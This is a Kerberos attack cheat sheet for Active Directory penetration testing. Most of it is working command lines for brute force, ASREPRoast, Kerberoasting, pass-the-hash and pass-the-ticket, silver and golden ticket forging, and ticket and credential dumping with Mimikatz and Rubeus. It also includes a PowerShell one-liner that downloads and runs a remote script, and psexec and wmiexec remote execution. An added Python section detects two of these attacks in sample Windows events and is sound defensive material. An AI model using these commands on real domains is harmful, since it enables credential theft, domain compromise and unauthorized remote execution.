
Domain Penetration | Kerberos Attack Cheat Sheet

0x01 Brute force

Using kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

Using the Rubeus version that includes the brute-force module:

# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>
# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>

0x02 ASREPRoast

Using Impacket's example GetNPUsers.py:

# check ASREPRoast for all domain users (credentials required)
python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

Using Rubeus:

# check ASREPRoast for all users in current domain
.\Rubeus.exe asreproast /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>

Cracking with a password dictionary:

hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_file>
john --wordlist=<passwords_file> <AS_REP_responses_file>

0x03 Kerberoasting

Using Impacket's example GetUserSPNs.py:

python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>

Using Rubeus:

.\Rubeus.exe kerberoast /outfile:<output_TGSs_file>

Using PowerShell:

iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>

Cracking with a password dictionary:

hashcat -m 13100 --force <TGSs_file> <passwords_file>
john --format=krb5tgs --wordlist=<passwords_file> <TGSs_file>
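Added defender-side example, not part of the original cheat sheet: the ASREPRoast requests of 0x02 and the Kerberoasting requests of 0x03 both leave traces in Windows Security events 4768 (TGT requested) and 4769 (service ticket requested). The script below runs over constructed sample events (the field names are simplified stand-ins for the real event fields) and flags accounts that accepted an AS-REQ without pre-authentication, and requesters that pulled RC4-encrypted service tickets for several user-account SPNs.

```python
from collections import defaultdict

# Constructed sample events (not real logs). Fields mirror Security event 4768
# (TGT requested: pre-auth type, encryption type) and 4769 (service ticket
# requested: service name, encryption type). 0x17 = RC4-HMAC, 0x12 = AES256.
RC4_HMAC = "0x17"

SAMPLE_EVENTS = [
    {"id": 4768, "account": "svc_backup", "pre_auth": "0", "etype": "0x17", "status": "0x0"},
    {"id": 4768, "account": "alice", "pre_auth": "2", "etype": "0x12", "status": "0x0"},
    {"id": 4769, "account": "bob", "service": "sqlsvc", "etype": "0x17", "status": "0x0"},
    {"id": 4769, "account": "bob", "service": "httpsvc", "etype": "0x17", "status": "0x0"},
    {"id": 4769, "account": "bob", "service": "WS01$", "etype": "0x12", "status": "0x0"},
    {"id": 4769, "account": "carol", "service": "krbtgt", "etype": "0x12", "status": "0x0"},
]


def asrep_roast_suspects(events):
    """4768 with pre-auth type 0 means the KDC answered an AS-REQ without
    pre-authentication: the account has 'Do not require Kerberos preauthentication'
    set and its AS-REP is exactly what hashcat mode 18200 cracks offline."""
    return sorted({e["account"] for e in events
                   if e["id"] == 4768 and e["pre_auth"] == "0" and e["status"] == "0x0"})


def kerberoast_suspects(events, min_spns=2):
    """4769 tickets encrypted with RC4 for user (non-'$', non-krbtgt) service
    accounts are the hashcat mode 13100 material. Report requesters that obtained
    RC4 tickets for at least `min_spns` distinct services."""
    rc4_by_requester = defaultdict(set)
    for e in events:
        if e["id"] != 4769 or e["etype"] != RC4_HMAC or e["status"] != "0x0":
            continue
        svc = e["service"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue  # machine accounts and the KDC itself are not Kerberoasting targets
        rc4_by_requester[e["account"]].add(svc)
    return {acct: sorted(spns) for acct, spns in rc4_by_requester.items() if len(spns) >= min_spns}


if __name__ == "__main__":
    print("ASREPRoast suspects:", asrep_roast_suspects(SAMPLE_EVENTS))
    print("Kerberoast suspects:", kerberoast_suspects(SAMPLE_EVENTS))
```

In a real environment the same logic applies to the XML or JSON export of the Security log; tuning `min_spns` and a time window keeps normal single-service access from alerting.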

0x04 Pass The Hash & Pass The Key

Using Impacket examples:

# Request the TGT with hash
python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
# Request the TGT with aesKey (more secure encryption, and probably stealthier since it is the default used by Microsoft)
python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
# Request the TGT with password
python getTGT.py <domain_name>/<user_name>:[password]
# If not provided, password is asked
# Set the TGT for impacket use
export KRB5CCNAME=<TGT_ccache_file>
# Execute remote commands with any of the following by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Using Rubeus and PsExec:

# Ask and inject the ticket
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
# Execute a cmd in the remote machine
.\PsExec.exe -accepteula \\<remote_hostname> cmd

0x05 Pass The Ticket (PTT)

Obtaining tickets from Linux

Check the ticket type and location:

grep default_ccache_name /etc/krb5.conf

If nothing is returned, the default is FILE:/tmp/krb5cc_%{uid}

If they are file tickets, you can copy and paste them (given sufficient permissions) in order to use them.

If they are KEYRING tickets, you can use tickey to obtain them:

# To dump current user tickets, if root, try to dump them all by injecting in other user processes
# to inject, copy tickey in a folder reachable by all users
cp tickey /tmp/tickey
/tmp/tickey -i

Obtaining tickets from Windows

Using Mimikatz:

mimikatz # sekurlsa::tickets /export

Using Rubeus in PowerShell:

.\Rubeus.exe dump
# After dumping with Rubeus, tickets are in base64; to write one to a file
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<base64_ticket>"))

Using ticket_converter.py to convert tickets between the Linux / Windows formats:

python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi

Using a ticket in Linux:

Using Impacket examples:

# Set the ticket for impacket use
export KRB5CCNAME=<TGT_ccache_file_path>
# Execute remote commands with any of the following by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Using a ticket in Windows:

Inject the ticket with Mimikatz:

mimikatz # kerberos::ptt <ticket_kirbi_file>

Inject the ticket with Rubeus:

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

Execute cmd on the remote machine with PsExec:

.\PsExec.exe -accepteula \\<remote_hostname> cmd

0x06 Silver ticket

Using Impacket examples:

# To generate the TGS with NTLM
python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>
# To generate the TGS with AES key
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>
# Set the ticket for impacket use
export KRB5CCNAME=<TGS_ccache_file>
# Execute remote commands with any of the following by using the TGS
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Using Mimikatz:

# To generate the TGS with NTLM
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
# To generate the TGS with AES 128 key
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes128:<service_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
# To generate the TGS with AES 256 key (more secure encryption, and probably stealthier since it is the default used by Microsoft)
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes256:<service_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
# Inject TGS with Mimikatz
mimikatz # kerberos::ptt <ticket_kirbi_file>

Inject the ticket with Rubeus:

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

Execute cmd on the remote machine with PsExec:

.\PsExec.exe -accepteula \\<remote_hostname> cmd

0x07 Golden ticket

Using Impacket examples:

# To generate the TGT with NTLM
python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>
# To generate the TGT with AES key
python ticketer.py -aesKey <krbtgt_aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>
# Set the ticket for impacket use
export KRB5CCNAME=<TGT_ccache_file>
# Execute remote commands with any of the following by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Using Mimikatz:

# To generate the TGT with NTLM
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>
# To generate the TGT with AES 128 key
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>
# To generate the TGT with AES 256 key (more secure encryption, and probably stealthier since it is the default used by Microsoft)
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>
# Inject TGT with Mimikatz
mimikatz # kerberos::ptt <ticket_kirbi_file>

Inject the ticket with Rubeus:

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

Execute cmd on the remote machine with PsExec:

.\PsExec.exe -accepteula \\<remote_hostname> cmd

0x08 Miscellaneous

Obtain the NTLM hash from a known password:

python3 -c 'import hashlib; print(hashlib.new("md4", "<password>".encode("utf-16le")).hexdigest())'

0x09 Related tools

kerbrute.py: https://github.com/TarlogicSecurity/kerbrute
Rubeus: https://github.com/Zer1t0/Rubeus
PsExec: https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
Impacket: https://github.com/SecureAuthCorp/impacket
tickey: https://github.com/TarlogicSecurity/tickey
Mimikatz: https://github.com/gentilkiwi/mimikatz

This article is shared from the WeChat public account Bypass (Bypass--), author: Bypass


Originally published: 2019-12-23

